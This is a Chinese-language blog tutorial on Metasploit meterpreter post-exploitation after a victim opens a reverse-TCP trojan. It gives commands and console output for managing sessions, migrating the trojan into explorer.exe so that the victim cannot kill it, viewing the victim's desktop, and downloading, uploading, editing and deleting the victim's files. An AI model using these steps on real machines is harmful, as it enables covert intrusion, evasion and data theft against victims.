Metasloit之木马文件操作功能

  • A+
所属分类:颓废's Blog

Metasloit之木马文件操作功能

本章节内容是上接”09-Metasploit之我的远程控制软件”的,

首先还是生产木马,选择TCP反向连接方式,监听相关IP和端口,受害者打开木马,连接成功回显↓

meterpreter

进入meterpreter之后即可进行一些相关木马操作了,下面是正式本章内容

首先可以查看帮助文档,命令“help”,挑常用操作来讲↓↓↓

------------------------------------------------------------------------------------------------

background    -->背景当前会话,意思暂时不查看该连接会话
回显:[*] Backgrounding session 1...    -->当前会话转移后台,ID为1

sessions  或者sessions -l    -->查看当前后端有哪些连接会话
回显中一般都会出现Id数,想要哪个会话就去选择对应的会话Id即可

sessions -i 1    -->选择Id为1的连接会话,返回我们的木马连接,回显:
[*] Starting interaction with 1...
meterpreter > 

木马也有可能会被受害者发现,会被随时结束掉,所以我们可以利用“注入进程”技术
那么我们就得需要知道受害者的相关进程信息:

ps    -->查看进程信息
关于进程的选用一般选择的是explorer.exe,这个是桌面管理进程,若关闭该进程会导致桌面图标全部消失
查看进程后发现进程信息如下:
3764   3644   explorer.exe                x64   1        GOS-01601281118/Administrator  C:/Windows/explorer.exe                       //需要注入的进程

15856  3764   payload.exe                 x86   1        GOS-01601281118/Administrator  C:/Users/Administrator/Desktop/payload.exe    //我们的木马程序进程

其中PID就是进程ID,那么就是将15856进程注入进3764进程,使用“migrate”命令,如下:

migrate 3764    -->命令“migrate PID”,将当前连接的木马进程注入至PID为3764的进程中,回显:
meterpreter > migrate 3764
[*] Migrating from 15856 to 3764...
[*] Migration completed successfully.
meterpreter > 

表示成功注入,我们再回头查看我们的木马程序进程payload.exe还在不在(已经不在了)
注入成功后,我们再次dir查看当前目录下的文件和文件夹的时候已经默认explorer.exe的目录下了

run vnc    -->远程查看桌面
这里我本地调用了C:/Users/ADMINI~1/AppData/Local/Temp/seCpIyuPreHM.exe程序,但是在开启的时候报错

------------------------------------------------------------------------------------------------

文件管理功能-->Stdapi: File system Commands(文件系统命令)

cd          -->切换目录,cd e: 切换到E盘,利用“ls”和“dir”都可以查看当前目录文件文件夹

download    -->下载文件,download f:/test.txt

edit        -->编辑文件,edit f:/test.txt  这里使用了vim文本编辑功能
   
cat         -->查看文件,cat f:/test.txt

mkdir       -->创建文件夹,mkdir f:/litteryi

mv          -->移动文件,mv f:/test.txt e:/test.txt

rm          -->删除文件,rm f:/test.txt

upload      -->上传文件,upload test.txt f:/test.txt

rmdir       -->删除文件夹,rmdir f:/litteryi

shell       -->获取shell,这个功能相对比较弱,而且还根据情况可能会出现乱码

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: